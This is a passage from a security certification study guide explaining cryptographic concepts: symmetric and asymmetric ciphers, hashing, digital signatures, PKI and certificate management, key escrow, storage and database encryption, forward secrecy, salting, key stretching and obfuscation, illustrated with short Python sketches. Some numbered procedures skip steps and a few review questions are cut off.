1. Alice and Bob meet to agree which cipher to use and a secret key value. They
both record the value of the secret key, making sure that no one else can
discover it.
4. Bob receives the ciphertext and is able to decrypt it by applying the same
cipher with his copy of the secret key.
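The shared-key flow above can be sketched with a toy repeating-key XOR cipher in Python. This cipher is invented here purely for illustration and is NOT secure for real use; it only demonstrates the defining symmetric property that the same secret key both encrypts and decrypts.

```python
# Toy illustration only (NOT a real cipher): repeating-key XOR shows that
# in symmetric encryption, one shared secret key encrypts and decrypts.
def xor_cipher(data: bytes, key: bytes) -> bytes:
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

secret_key = b"agreed-in-step-1"          # Alice and Bob both hold this
plaintext = b"Meet at the usual place."

ciphertext = xor_cipher(plaintext, secret_key)   # Alice encrypts
recovered = xor_cipher(ciphertext, secret_key)   # Bob decrypts, same key

assert recovered == plaintext
print(ciphertext.hex())
```

Real-world symmetric encryption uses a vetted cipher such as AES; the key-distribution problem described next applies to any symmetric scheme.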
Symmetric encryption is very fast. It is used for bulk encryption of large amounts of
data. The main problem is how Alice and Bob “meet” to agree upon or exchange the
key. If Mallory intercepts the key and obtains the ciphertext, the security is broken.
Note that symmetric encryption alone cannot be used for authentication or integrity. Because
Alice and Bob both know the same key, each can create exactly the same ciphertexts, so neither
can prove which of them produced a given message.
Key Length
Encryption algorithms use a key to increase the security of the process. For
example, if you consider the substitution cipher ROT13, you should realize that the
key is 13. You could use 17 to achieve a different ciphertext from the same method.
The key is important because it means that even if the cipher method is known, a
message still cannot be decrypted without knowledge of the specific key.
A keyspace is the range of values that the key could be. In the ROT13 example, the
keyspace is 25 (ROT1 through ROT25). Using ROT0 or ROT26 would result in ciphertext
identical to the plaintext. Using a value greater than 26 to shift through the alphabet
multiple times is equivalent to a key from the 1-25 range. ROT0 and ROT26+ are
weak keys and should not be used.
Modern ciphers use large keyspaces where there are trillions of possible key values.
This makes the key difficult to discover via brute force cryptanalysis. Brute force
cryptanalysis means attempting decryption of the ciphertext with every possible key
value and reading the result to determine if it is still gibberish or plaintext.
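Brute force cryptanalysis is trivial against a ROT-N cipher because the keyspace is so small. The sketch below (helper names invented for illustration) tries every key and uses a crude "does it contain a known word?" test in place of human reading:

```python
import string

# Shift lowercase letters by the key value (ROT-N substitution cipher).
def rot(text, key):
    shifted = string.ascii_lowercase[key:] + string.ascii_lowercase[:key]
    return text.translate(str.maketrans(string.ascii_lowercase, shifted))

ciphertext = rot("attackatdawn", 13)   # a ROT13-encrypted message

# The keyspace is only 25, so every candidate key can be tried instantly.
for key in range(1, 26):
    candidate = rot(ciphertext, 26 - key)   # shift back by the trial key
    if "attack" in candidate:               # crude "is it plaintext?" test
        print(f"key={key}: {candidate}")    # prints key=13 with the plaintext
```

Against a modern cipher with a 2^128 keyspace, this exhaustive loop would not complete in the lifetime of the universe, which is the point of large keys.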
Keys for modern symmetric ciphers use a pseudorandomly generated number of
bits. The number of bits is the key length. For example, the most commonly used
symmetric cipher is the Advanced Encryption Standard (AES). This can be used with
two key lengths. AES-128 uses a 128-bit key length. A bit can have one of two values
(0 or 1), so the number of possible key values is two multiplied by itself a number of
times equivalent to the key length. This is written as 2^128, where 2 is the base and 128
is the exponent. AES-256 has a keyspace of 2^256. This keyspace is not twice as large
as AES-128's; it is many trillions of times bigger and consequently significantly more
resistant to brute force attacks.
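The size claim is easy to check with Python's arbitrary-precision integer arithmetic:

```python
# Verify the keyspace comparison: AES-256's keyspace is not double
# AES-128's, but 2^128 times larger.
aes128_keyspace = 2 ** 128
aes256_keyspace = 2 ** 256

print(aes128_keyspace)   # about 3.4 x 10^38 possible keys
print(aes256_keyspace // aes128_keyspace == 2 ** 128)  # True
```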
The drawback of using larger keys is that the computer must use more memory and
processor cycles to perform encryption and decryption.
Asymmetric Encryption
In a symmetric encryption cipher, the same secret key is used to perform both
encryption and decryption operations. With an asymmetric algorithm, encryption
and decryption are performed by two different but related public and private keys
in a key pair.
When a public key is used to encrypt a message, only the paired private key can
decrypt the ciphertext. The public key cannot be used to decrypt the ciphertext. The
keys are generated in a way that makes it computationally infeasible to derive the private key
from the public key. This means that the key pair owner can distribute the public
key to anyone they want to receive secure messages from:
1. Bob generates a key pair and keeps the private key secret.
2. Bob publishes the public key. Alice wants to send Bob a confidential message
so they take a copy of Bob’s public key.
5. Bob receives the message and is able to decrypt it using their private key.
6. If Mallory has been snooping, they can intercept both the message and the
public key.
7. However, Mallory cannot use the public key to decrypt the message, so the
system remains secure.
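The public/private relationship can be demonstrated with textbook RSA using deliberately tiny primes. This is a toy invented for illustration (no padding, insecure key sizes); real systems always use vetted cryptographic libraries.

```python
# Toy, INSECURE textbook RSA: shows that the public key encrypts and only
# the paired private key decrypts. Never use this for real data.
p, q = 61, 53
n = p * q                           # modulus, part of both keys
e = 17                              # public exponent
d = pow(e, -1, (p - 1) * (q - 1))   # private exponent (modular inverse)

message = 42                        # must be < n in textbook RSA
ciphertext = pow(message, e, n)     # Alice encrypts with Bob's PUBLIC key
recovered = pow(ciphertext, d, n)   # Bob decrypts with his PRIVATE key

assert recovered == message
# Mallory sees (n, e) and ciphertext, but cannot feasibly recover d.
print(ciphertext, recovered)
```

Knowing n and e does not reveal d unless the attacker can factor n, which is infeasible at real key sizes (2,048 bits and up).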
Hashing
A cryptographic hashing algorithm produces a fixed-length string of bits from an
input plaintext that can be of any length. The output can be referred to as a hash or
as a message digest. The function is designed so that it is impossible to recover the
plaintext data from the digest (one-way) and so that different inputs are unlikely to
produce the same output (a collision).
A hashing algorithm is used to prove integrity. For example, Bob and Alice can
compare the values used for a password in the following way:
1. Bob has a digest calculated from Alice’s plaintext password. Bob cannot
recover the plaintext password value from the hash.
2. When Alice needs to authenticate to Bob, they type their password, convert it
to a hash, and send the digest to Bob.
3. Bob compares Alice’s digest to the hash value on file. If they match, Bob can
be sure that Alice typed the same password.
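The comparison in the steps above can be sketched with Python's standard hashlib. Note that real password stores also add a per-user salt and a deliberately slow hash such as PBKDF2; this sketch only shows the compare-digests idea.

```python
import hashlib
import hmac

# Bob's stored value: a digest of Alice's password, not the password itself.
stored_digest = hashlib.sha256(b"correct horse").hexdigest()

# Alice authenticates by hashing what she typed and sending the digest.
attempt = hashlib.sha256(b"correct horse").hexdigest()

# compare_digest avoids leaking information through timing differences.
print(hmac.compare_digest(stored_digest, attempt))  # True
```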
As well as comparing password values, a hash of a file can be used to verify the
integrity of that file after transfer.
1. Alice runs a hash function on the setup.exe file for their product. They publish
the digest on their website with a download link for the file.
2. Bob downloads the setup.exe file and makes a copy of the digest.
3. Bob runs the same hash function on the downloaded setup.exe file and
compares it to the reference value published by Alice. If it matches the value
published on the website, Bob assumes the file has integrity.
4. Consider that Mallory might be able to substitute the download file for a
malicious file. Mallory cannot change the reference hash, however.
5. This time, Bob computes a hash but it does not match, leading him to suspect
that the file has been tampered with.
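The download-verification steps can be sketched the same way, hashing a file in chunks. A temporary file stands in for setup.exe so the sketch is self-contained:

```python
import hashlib
import os
import tempfile

# Compute a SHA-256 digest of a file, reading in chunks so that large
# files do not need to fit in memory.
def file_sha256(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(8192), b""):
            h.update(chunk)
    return h.hexdigest()

# Stand-in for the setup.exe download in the steps above.
fd, path = tempfile.mkstemp()
os.write(fd, b"installer bytes")
os.close(fd)

published = file_sha256(path)    # Alice's reference value on the website
downloaded = file_sha256(path)   # Bob's digest of the downloaded copy
print(published == downloaded)   # True: the file has integrity
os.remove(path)
```

If Mallory substituted the file, Bob's recomputed digest would differ from the published value, exposing the tampering.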
Computing an SHA value from a file (Screenshot used with permission from Microsoft.)
Digital Signatures
A single hash function, symmetric cipher, or asymmetric cipher is called a
cryptographic primitive. A complete cryptographic system or product is likely
to use multiple cryptographic primitives within a cipher suite. The properties of
different symmetric/asymmetric/hash types and of specific ciphers for each type
impose limitations on their use in different contexts and for different purposes.
Encryption can be used to ensure confidentiality. Cryptographic ciphers can also be
used for integrity and authentication. If you can encode a message in a way that no
one else can replicate, then the recipient of the message knows with whom they are
communicating (that is, the sender is authenticated).
Cryptography allows subjects to identify and authenticate themselves. The subject could be a
person or a computer such as a web server.
Public key cryptography can authenticate a sender, because they control a private
key that produces messages in a way that no one else can. Hashing proves integrity
by computing a unique fixed-size message digest from any variable length input.
These two cryptographic ciphers can be combined to make a digital signature:
1. The sender (Alice) creates a digest of a message, using a pre-agreed hash
algorithm, such as SHA256, and then performs a signing operation on the
digest using her chosen asymmetric cipher and private key.
2. Alice attaches the digital signature to the message and sends both the
signature and the message to Bob.
3. Bob verifies the signature using Alice’s public key, obtaining the original hash.
4. Bob then calculates his own digest for the document (using the same
algorithm as Alice) and compares it with Alice’s hash.
If the two digests are the same, then the data has not been tampered with during
transmission, and Alice’s identity is guaranteed. If either the data had changed or a
malicious user (Mallory) had intercepted the message and used a different private
key to sign it, the hashes would not match.
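The sign-then-verify flow can be sketched by combining a SHA-256 digest with the same textbook-RSA idea (tiny primes, no padding — a toy for illustration only, never for real use):

```python
import hashlib

# Toy, INSECURE illustration of a digital signature: hash the message,
# sign the digest with the private key, verify with the public key.
p, q = 61, 53
n, e = p * q, 17
d = pow(e, -1, (p - 1) * (q - 1))

message = b"Pay invoice #100"
# Reduce the digest mod n only because this toy modulus is tiny.
digest = int.from_bytes(hashlib.sha256(message).digest(), "big") % n

signature = pow(digest, d, n)     # Alice signs with her PRIVATE key
recovered = pow(signature, e, n)  # Bob verifies with Alice's PUBLIC key

# Bob recomputes the digest himself and compares.
print(recovered == digest)        # True: message intact, signer is Alice
```

If Mallory altered the message or signed with a different private key, the recovered and recomputed digests would not match.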
There are several standards for creating digital signatures. The Public Key Cryptography
Standard #1 (PKCS#1) defines the use of RSA’s algorithm. The Digital Signature
Algorithm (DSA) uses a cipher called ElGamal, but Elliptic Curve DSA (ECDSA) is now
more widely used. DSA and ECDSA were developed as part of the US government’s
Federal Information Processing Standards (FIPS).
Review Activity:
Cryptographic Algorithms
2. Considering that cryptographic hashing is one way and the digest cannot
Topic 3B
Public Key Infrastructure
6
Public Key Infrastructure (PKI) is the framework that helps to establish trust in the
use of public key cryptography to sign and encrypt messages via digital certificates.
A digital certificate is a public assertion of identity, validated by a certificate
authority (CA).
As a security professional, you are very likely to have to install and maintain PKI
certificate services for private networks. You may also need to obtain and manage
certificates from third-party PKI providers. This topic will help you to explain the
importance of using appropriate cryptographic solutions to implement PKI.
Certificate Authorities
Public key cryptography solves the problem of distributing encryption keys when
you want to communicate securely with others or authenticate a message that you
send to others.
• When you want others to send you confidential messages, you give them
your public key to use to encrypt the message. The message can then only be
decrypted by your private key, which you keep known only to yourself.
• When you want to authenticate yourself to others, you sign a hash of your
message with your private key. You give others your public key to use to verify
the signature. As only you know the private key, everyone can be assured that
only you could have created the signature.
The basic problem with public key cryptography is that while the owner of a private
key can authenticate messages, there is no mechanism for establishing the owner’s
identity. This problem is particularly evident with e-commerce. How can you be
sure that a shopping site or banking service is really operated by the organization it claims to represent?
The fact that the site is distributing a public key to secure communications is no
guarantee of actual identity. How do you know that you are corresponding directly
with the site using its genuine public key? How can you be sure there isn’t a threat
actor with network access intercepting and modifying what you think the legitimate
server is sending you?
Public key infrastructure (PKI) aims to prove that the owners of public keys
are who they say they are. Under PKI, anyone issuing a public key should publish
it in a digital certificate. The certificate’s validity is guaranteed by a certificate
authority (CA).
PKI can use private or third party CAs. A private CA can be set up within an
organization for internal communications. The certificates it issues will only be
trusted within the organization. For public or business-to-business communications,
a third-party CA can be used to establish a trust relationship between servers and
clients. Examples of third-party CAs include Comodo, DigiCert, GeoTrust, IdenTrust,
and Let’s Encrypt.
Public key infrastructure allows clients to establish a trust relationship with servers via
certificate authorities.
• Ensure the validity of certificates and the identity of those applying for them
(registration).
• Manage the servers (repositories) that store and administer the certificates.
Digital Certificates
A digital certificate is essentially a wrapper for a subject’s public key. As well as the
public key, it contains information about the subject and the certificate’s issuer. The
certificate is digitally signed to prove that it was issued to the subject by a particular
CA. The subject could be a human user (for certificates allowing the signing of
messages, for instance) or a computer server (for a web server hosting confidential
transactions, for instance).
Digital certificate details showing subject's public key. (Screenshot used with
permission from Microsoft.)
Digital certificates are based on the X.509 standard approved by the International
Telecommunication Union and standardized by the Internet Engineering Task Force
(tools.ietf.org/html/rfc5280). RSA also created a set of standards, referred to as Public
Key Cryptography Standards (PKCS), to promote the use of public key infrastructure.
Root of Trust
The root of trust model defines how users and different CAs can trust one another.
Each CA issues itself a certificate. This is referred to as the root certificate. The root
certificate is self-signed, meaning the CA server signs a certificate issued to itself. A
root certificate uses an RSA key size of 2,048 or 4,096 bits or the ECC equivalent. The
subject of the root certificate is set to the organization/CA name, such as “CompTIA
Root CA.”
The root certificate can be used to sign other certificates issued by the CA. Installing
the CA’s root certificate means that hosts will automatically trust any certificates
signed by that CA.
Single CA
In this simple model, a single root CA issues certificates directly to users and
computers. This single CA model is often used on private networks. The problem
with this approach is that the single CA server is very exposed. If it is compromised
the whole PKI collapses.
Third-party CAs
Most third-party CAs operate a hierarchical model. In the hierarchical model, the
root CA issues certificates to one or more intermediate CAs. The intermediate CAs
issue certificates to subjects (leaf or end entities). This model has the advantage
that different intermediate CAs can be set up with certificate policies that let users
clearly see what a particular certificate is intended for. Each leaf certificate
can be traced to the root CA along the certification path. This is also referred to as
certificate chaining or a chain of trust.
The web server for www.example.org is identified by a certificate issued by the DigiCert TLS
CA1 intermediate CA. The intermediate CA's certificate is signed by DigiCert's Global Root CA
(Screenshot used with permission from Microsoft).
Self-signed Certificates
In some circumstances, using PKI can be too difficult or expensive to manage.
Any machine, web server, or program code can be deployed with a self-signed
certificate. For example, the web administrative interfaces of consumer routers
are often only protected by a self-signed certificate. Self-signed certificates can also
be useful in development and test environments. The operating system or browser
will mark self-signed certificates as untrusted, but a user can choose to override
this. The nature of self-signed certificates makes them very difficult to validate. They
should not be used to protect critical hosts and applications.
Using a web form in the OPNsense firewall appliance to request a certificate. The DNS and
IP alternative names must match the values that clients will use to browse the site.
The example domain's certificate is configured with alternative subject names for different
top-level domains and subdomains. (Screenshot used with permission from Microsoft.)
It is still safer to put the FQDN in the CN as well, because not all browsers and
implementations stay up to date with the standards.
The SAN field also allows a certificate to represent different subdomains, such
as www.comptia.org and members.comptia.org. Listing the specific
subdomains is more secure, but if a new subdomain is added, a new certificate
must be issued. A wildcard domain, such as *.comptia.org, means that the
certificate issued to the parent domain will be accepted as valid for all subdomains
(to a single level).
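The single-level wildcard rule can be sketched as a label-count check. The helper below is hypothetical and simplified from the real certificate name-matching rules (see RFC 6125); it only illustrates why *.comptia.org matches www.comptia.org but not a deeper subdomain:

```python
# Hypothetical helper: does a certificate name (possibly a wildcard)
# cover a hostname? The "*" matches exactly one subdomain label.
def wildcard_matches(pattern, hostname):
    if not pattern.startswith("*."):
        return pattern == hostname
    p_labels = pattern.split(".")
    h_labels = hostname.split(".")
    # Same number of labels, and every label after the "*" must match.
    return len(p_labels) == len(h_labels) and p_labels[1:] == h_labels[1:]

print(wildcard_matches("*.comptia.org", "www.comptia.org"))   # True
print(wildcard_matches("*.comptia.org", "a.b.comptia.org"))   # False
print(wildcard_matches("*.comptia.org", "comptia.org"))       # False
```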
CompTIA's website certificate configured with a wildcard domain, allowing access via either https://
comptia.org or https://www.comptia.org. (Screenshot used with permission from Microsoft.)
A certificate also contains fields for Organization (O), Organizational Unit (OU), Locality
(L), State (ST), and Country (C). These are concatenated with the common name to form
a Distinguished Name (DN). For example, Example LLC's DN could be the following:
CN=www.example.com, OU=Web Hosting, O=Example LLC, L=Chicago, ST=Illinois, C=US.
Different certificate types can be used for purposes other than server/computer
identification. User accounts can be issued with email certificates, in which case the SAN
is an RFC 822 email address. A code-signing certificate is used to verify the publisher or
developer of software and scripts. These don't use a SAN, but the CA must validate the
organization and locale details to ensure accuracy and that a rogue developer is not
attempting to impersonate a well-known software company.
Certificate Revocation
A certificate may be revoked or suspended:
• A revoked certificate is no longer valid and cannot be “un-revoked” or reinstated.
The distribution point field in a digital certificate identifies the location of the
list of revoked certificates, which are published in a CRL file signed by the CA.
(Screenshot used with permission from Microsoft.)
With the CRL system, there is a risk that the certificate might be revoked but still
accepted by clients because an up-to-date CRL has not been published. A further
problem is that the browser (or other application) may not be configured to
perform CRL checking, although this now tends to be the case only with legacy
browser software.
Another means of providing up-to-date information is to check the certificate’s
status on an Online Certificate Status Protocol (OCSP) server. Rather than returning
a whole CRL, this communicates just the requested certificate's status. Details of the OCSP
responder service should be published in the certificate.
Most OCSP servers can query the certificate database directly and obtain the
real-time status of a certificate. Other OCSP servers actually depend on the
CRLs and are limited by the CRL publishing interval.
Key Management
Key management refers to operational considerations for the various stages in a
key’s lifecycle. A key’s lifecycle may involve the following stages:
• Key Generation—creates an asymmetric key pair or symmetric secret key of the
required strength, using the chosen cipher.
A decentralized key management model means that keys are generated and
managed directly on the computer or user account that will use the certificate. This
does not require any special setup and so is easy to deploy. It makes the detection
of key compromise more difficult, however.
Some organizations prefer to centralize key generation and storage using a tool
such as a key management system. In one type of cryptographic key management
system, a dedicated server or appliance is used to generate and store keys. When
a device or app needs to perform a cryptographic operation, it uses the Key
Management Interoperability Protocol (KMIP) to communicate with the server.
• A key stored in the file system is only as secure as any other file. It could
easily be compromised via the user credential or physical theft of the device. It
is also difficult to ensure that key access is fully audited. Ideally, cryptographic
storage is tamper evident. This means that it is known immediately when a
private or secret key has been compromised and it can be revoked and any
ciphertexts re-encrypted with a new key.
A pseudo-random number generator (PRNG) working during key generation using GPG. This
method gains entropy from user mouse and keyboard usage.
Vendors can certify their products against the Federal Information Processing Standard
140-2 (FIPS 140-2) to establish trust in the market.
Using a cryptoprocessor means that keys are not directly accessible via the file
system. The cryptoprocessor interacts with applications that need to access the key
via an application programming interface (API) that implements PKCS#11.
One vulnerability in this system is that decrypted data needs to be loaded into
the computer’s system memory (RAM) for applications to access it. This raises
the potential for a malicious process to gain access to the data via some type of
exploit. This vulnerability can be mitigated by implementing a secure enclave. A
trusted execution environment (TEE) secure enclave, such as Intel Software Guard
Extensions, is able to protect data stored in system memory so that an untrusted
process cannot read it. A secure enclave is designed so that even processes with
root or system privileges cannot access it without authorization. The enclave is
locked to a list of one or more digitally signed processes.
Key Escrow
If a private or secret key is lost or damaged, ciphertexts cannot be recovered unless
a backup of the key has been made. Making copies of the key is problematic as it
becomes more likely that a copy will be compromised and more difficult to detect
that a compromise has occurred.
These issues can be mitigated by using escrow and M of N controls. Escrow means
that something is held independently. In terms of key management, this refers to
archiving a key (or keys) with a third party. M of N means that an operation cannot
be performed by a single individual. Instead, a quorum (M) of available persons (N)
must agree to authorize the operation.
A key can be split into one or more parts. Each part can be held by separate escrow
providers, reducing the risk of compromise. An account with permission to access
a key held in escrow is referred to as a key recovery agent (KRA). A recovery policy
can require two or more KRAs to authorize the operation. This mitigates the risk of
a KRA attempting to impersonate the key owner.
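The M of N principle can be illustrated with a simple key-splitting sketch. This toy example (not any particular escrow product) uses XOR shares, so all N shares are needed to recover the key; real escrow systems typically use a threshold scheme, such as Shamir’s Secret Sharing, so that any M of the N shares suffice:

```python
import secrets

def split_key(key, n):
    """Split a key into n XOR shares; all n are needed to recover it."""
    shares = [secrets.token_bytes(len(key)) for _ in range(n - 1)]
    last = key
    for s in shares:
        last = bytes(a ^ b for a, b in zip(last, s))
    shares.append(last)
    return shares

def recover_key(shares):
    """XOR all shares together to reconstruct the original key."""
    key = bytes(len(shares[0]))
    for s in shares:
        key = bytes(a ^ b for a, b in zip(key, s))
    return key

key = secrets.token_bytes(32)        # 256-bit secret key
shares = split_key(key, 3)           # give each share to a separate KRA
assert recover_key(shares) == key    # all three must cooperate to recover
```

Because any subset smaller than the full share count yields only random bytes, no single escrow provider or KRA can reconstruct the key alone.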
Review Activity:
Public Key Infrastructure
3. What extension field is used with a web server certificate to support the
identification of the server by multiple specific subdomain labels?
5. You are advising a customer about encryption for data backup security
and the key escrow services that you offer. How should you explain the
risks of key escrow and potential mitigations?
Topic 3C
Cryptographic Solutions
• Data in transit (or data in motion)—is the state when data is transmitted over
a network.
• Data in use (or data in processing)—is the state when data is present in volatile
memory, such as system RAM or CPU registers and cache.
2. The system generates a symmetric secret key for the chosen cipher, such as
AES with a 128- or 256-bit key. This is referred to as a file, media, or data
encryption key (DEK). This key is used to encrypt the target data.
3. The data encryption key is then encrypted using the public key portion of
the KEK.
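The wrap/unwrap flow can be sketched as follows. This is a toy illustration only: the `keystream_xor` function stands in for a real cipher such as AES, and a symmetric KEK is used for brevity, where a product would typically wrap the DEK with the public half of an asymmetric KEK as described in the steps above:

```python
import hashlib
import secrets

def keystream_xor(key, data):
    # Toy stream cipher: XOR with a SHA-256 counter keystream.
    # Illustration only -- a real FDE product uses AES (e.g., XTS mode).
    out = bytearray()
    for i in range(0, len(data), 32):
        block = hashlib.sha256(key + i.to_bytes(8, "big")).digest()
        chunk = data[i:i + 32]
        out += bytes(a ^ b for a, b in zip(chunk, block))
    return bytes(out)

kek = secrets.token_bytes(32)          # key encrypting key (user/TPM-protected)
dek = secrets.token_bytes(32)          # data encryption key, generated per volume
ciphertext = keystream_xor(dek, b"secret volume data")
wrapped_dek = keystream_xor(kek, dek)  # only the wrapped DEK is stored on disk

# Unlock: recover the DEK with the KEK, then decrypt the data.
assert keystream_xor(kek, wrapped_dek) == dek
assert keystream_xor(dek, ciphertext) == b"secret volume data"
```

The point of the two-layer design is that the bulk data never needs re-encrypting when the user credential changes; only the small wrapped DEK is rewritten under a new KEK.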
Metadata can include a list of files, the file owner, and created/last modified dates.
Free or unallocated space can contain data remnants, where a file has been marked as
deleted, but the data has not actually been erased from the storage medium.
If the device has a TPM or HSM compatible with the encryption product, the disk/
volume/file system can be locked by keys stored in the TPM or HSM.
Database Encryption
A structured database stores data in tables. Each table is composed of column
fields with a given data type. Records are stored as rows in the table with a value
entered for each field. The table data is ultimately stored as files on a volume, but
access is designed to be mediated through a database management system (DBMS)
running a database language such as Structured Query Language (SQL). Typically,
the database is hosted on a server and accessed by client applications.
The underlying files could be protected by a disk or volume encryption product
running on the server. This will typically have an adverse impact on performance,
so encryption is more commonly implemented by the DBMS or by a plug-in.
Encryption can be applied at different granular levels. While each DBMS supports
different features, the following encryption options, based on Microsoft’s SQL
Server DBMS, are typical.
Database-Level Encryption
Database- or page-level encryption and decryption occurs when any data is
transferred between disk and memory. This is referred to as transparent data
encryption (TDE) in SQL Server. A page is the means by which the database engine
returns the data requested by a query from the underlying storage files. This type of
encryption means that all the records are encrypted while they are stored on disk,
protecting against theft of the underlying media. It also encrypts logs generated by
the database.
Record-Level Encryption
Many databases contain secrets that should not be known by the database
administrator. Public key encryption can solve this problem by storing the private
key used to unlock the value of a cell outside of the database.
Cell/column encryption is applied to one or more fields within a table. This can have
less of a performance impact than database-level encryption, but the administrator
needs to identify which fields need protection. It can also complicate client access to
the data. The encryption/decryption mechanism can work in several ways, but with
SQL Server’s Always Encrypted feature, the data remains encrypted when loaded
into memory. It is only decrypted when the client application supplies the key. The
plaintext key is not available to the DBMS, so the database administrator cannot
decrypt the data. This allows for the separation of duties between the database
administrator and the data owner, which is important for privacy.
Some solutions may additionally support record-level encryption. For example,
a health insurer’s database might store protected health information about its
customers. Each customer could be identified by a separate key pair. This key pair
would be used to encrypt data at a row/record level. The table contains records
separately protected by different keys. This allows fine-grained control over how
data can be accessed to meet compliance requirements for security and privacy.
2. Alice encrypts their message using a secret key cipher, such as AES. In this
context, the secret key is referred to as a session key.
4. Alice attaches the encrypted session key to the ciphertext message in a digital
envelope and sends it to Bob.
Using Diffie-Hellman to derive a secret value to use to generate a shared symmetric encryption
key securely over a public channel. (Images © 123RF.com.)
Using ephemeral session keys means that any future compromise of the server will
not translate into an attack on recorded data. Also, even if an attacker can obtain
the key for one session, the other sessions will remain confidential. This massively
increases the amount of cryptanalysis that an attacker would have to perform to
recover an entire “conversation.”
PFS using the modular arithmetic shown in the diagram is called Diffie-Hellman
Ephemeral (DHE). PFS is now more usually implemented as Elliptic Curve DHE (ECDHE).
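The exchange can be sketched with modular arithmetic. The prime here is deliberately tiny for readability; real DHE groups use 2,048-bit or larger moduli, and ECDHE replaces the modular arithmetic with elliptic curve operations:

```python
import secrets

# Toy Diffie-Hellman parameters. Public values: prime modulus p and base g.
p, g = 2147483647, 5

a = secrets.randbelow(p - 2) + 1   # Alice's ephemeral private value
b = secrets.randbelow(p - 2) + 1   # Bob's ephemeral private value

A = pow(g, a, p)   # Alice sends A over the public channel
B = pow(g, b, p)   # Bob sends B over the public channel

# Both sides derive the same shared secret without ever transmitting it:
# (g^b)^a mod p == (g^a)^b mod p
assert pow(B, a, p) == pow(A, b, p)
```

Because a fresh `a` and `b` are generated for every session and discarded afterward, compromise of one session key reveals nothing about any other session, which is the basis of perfect forward secrecy.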
Salting
Cryptographic hash functions are often used for password storage and
transmission. A hash cannot be decrypted back to the plaintext password that
generated it; hash functions are one-way. However, passwords stored as hashes
are vulnerable to brute force and dictionary attacks.
A threat actor can generate hashes to try to find a match for a hash captured from
network traffic or a password file. A brute force attack simply runs through every
possible combination of letters, numbers, and symbols. A dictionary attack creates
hashes of common words and phrases.
Both these attacks can be slowed down by adding a salt value when creating the
hash. A salted hash is computed as follows:
hash = SHA(salt + password)
A unique, random salt value should be generated for each user account. This
mitigates the risk that if users choose identical plaintext passwords, there would
be identical hash values in the password file. The salt is not kept secret, because
any system verifying the hash must know the value of the salt. It simply means that
an attacker cannot use precomputed tables of hashes. The hash values must be
recomputed with the specific salt value for each password.
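A minimal sketch of salted hashing, using SHA-256 and a random per-account salt from the Python standard library (a production credential store would combine salting with key stretching rather than a single hash round):

```python
import hashlib
import os

def hash_password(password, salt=None):
    """Return (salt, hash) using a unique random salt per account."""
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.sha256(salt + password.encode()).digest()
    return salt, digest

def verify(password, salt, stored):
    # The salt is stored alongside the hash; it is not a secret.
    return hashlib.sha256(salt + password.encode()).digest() == stored

salt1, h1 = hash_password("Pa$$w0rd")
salt2, h2 = hash_password("Pa$$w0rd")
assert h1 != h2                       # same password, different hashes
assert verify("Pa$$w0rd", salt1, h1)
```

Note how two accounts with identical passwords produce different hash values, defeating precomputed (rainbow) tables.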
Key Stretching
Key stretching takes a key that’s generated from a user password plus a random
salt value and repeatedly converts it to a longer and more disordered key. The
initial key may be put through thousands of rounds of hashing. This might not be
difficult for the attacker to replicate, so it doesn’t actually make the key stronger. It
does slow the attack down, because the attacker has to do all this extra processing
for each possible key value. Key stretching can be performed by using a particular
software library to hash and save passwords when they are created. The Password-
Based Key Derivation Function 2 (PBKDF2) is very widely used for this purpose,
notably as part of Wi-Fi Protected Access (WPA).
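PBKDF2 is available in the Python standard library; a minimal sketch follows (the iteration count shown is an assumption and should be tuned as high as authentication workflows tolerate):

```python
import hashlib
import os

salt = os.urandom(16)
# 600,000 rounds of HMAC-SHA256. The iteration count is what slows an
# attacker down: each candidate password costs the same repeated work.
key = hashlib.pbkdf2_hmac("sha256", b"correct horse battery", salt, 600_000)
assert len(key) == 32   # derived 256-bit key
```

The same password, salt, and iteration count always derive the same key, so the verifier only needs to store the salt and parameters, never the password.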
Blockchain
Blockchain is a concept in which an expanding list of transactional records is
secured using cryptography. Each record is referred to as a block and is run through
a hash function. The hash value of the previous block in the chain is added to the
hash calculation of the next block in the chain. This ensures that each successive
block is cryptographically linked. Each block validates the hash of the previous block
all the way through to the beginning of the chain, ensuring that each historical
transaction has not been tampered with. In addition, each block typically includes
a time stamp of one or more transactions as well as the data involved in the
transactions themselves.
The blockchain is recorded in an open public ledger. This ledger does not exist
as an individual file on a single computer; rather, one of the most important
characteristics of a blockchain is that it is decentralized. The ledger is distributed
across a peer-to-peer (P2P) network in order to mitigate the risks associated with
having a single point of failure or compromise. Blockchain users can therefore
trust each other equally. Likewise, another defining quality of a blockchain is its
openness—everyone has the same ability to view every transaction on a blockchain.
Blockchain technology has a variety of potential applications. It can ensure the
integrity and transparency of financial transactions, legal contracts, copyright and
intellectual property (IP) protection, online voting systems, identity management
systems, and data storage.
Obfuscation
Obfuscation is the art of making a message or data difficult to find. It is security
by obscurity, which is normally deprecated. There are some uses for obfuscation
technologies, however:
• Steganography (literally meaning “hidden writing”) embeds information
within an unexpected source; a message hidden in a picture, for instance. The
container document or file is called the covertext. The message can be encrypted
by some mechanism before embedding it, providing confidentiality. The
technology can also provide integrity or non-repudiation; for example, it could
show that something was printed on a particular device at a particular time,
which could demonstrate that it was genuine or fake, depending on the context.
• Data masking can mean that all or part of the contents of a database field are
redacted by substituting all character strings with “x”, for example. A field might
be partially redacted to preserve metadata for analysis purposes. For example,
in a telephone number, the dialing prefix might be retained, but the subscriber
number is redacted. Data masking can also use techniques to preserve the
original format of the field.
• Tokenization means that all or part of the value of a database field is replaced
with a randomly generated token. The token is stored with the original value
on a token server or token vault, separate from the production database.
An authorized query or app can retrieve the original value from the vault, if
necessary, so tokenization is reversible. Tokenization is used as a substitute for
encryption because, from a regulatory perspective, an encrypted field is treated
the same as the original data, whereas a token is not.
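A minimal sketch of the last two techniques; the masking rule and token format here are illustrative assumptions, not any vendor’s implementation:

```python
import secrets

def mask_phone(number):
    """Data masking: keep the dialing prefix, redact the subscriber number."""
    return number[:4] + "x" * (len(number) - 4)

vault = {}   # token vault, held separately from the production database

def tokenize(value):
    """Tokenization: substitute a random token; the vault maps it back."""
    token = secrets.token_hex(8)
    vault[token] = value
    return token

def detokenize(token):
    return vault[token]   # only authorized queries should reach the vault

assert mask_phone("555-867-5309") == "555-xxxxxxxx"
card_token = tokenize("4111111111111111")
assert detokenize(card_token) == "4111111111111111"
```

Note the difference in reversibility: the masked value cannot be recovered at all, while the tokenized value can be retrieved, but only by systems with access to the vault.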
Review Activity:
Cryptographic Solutions
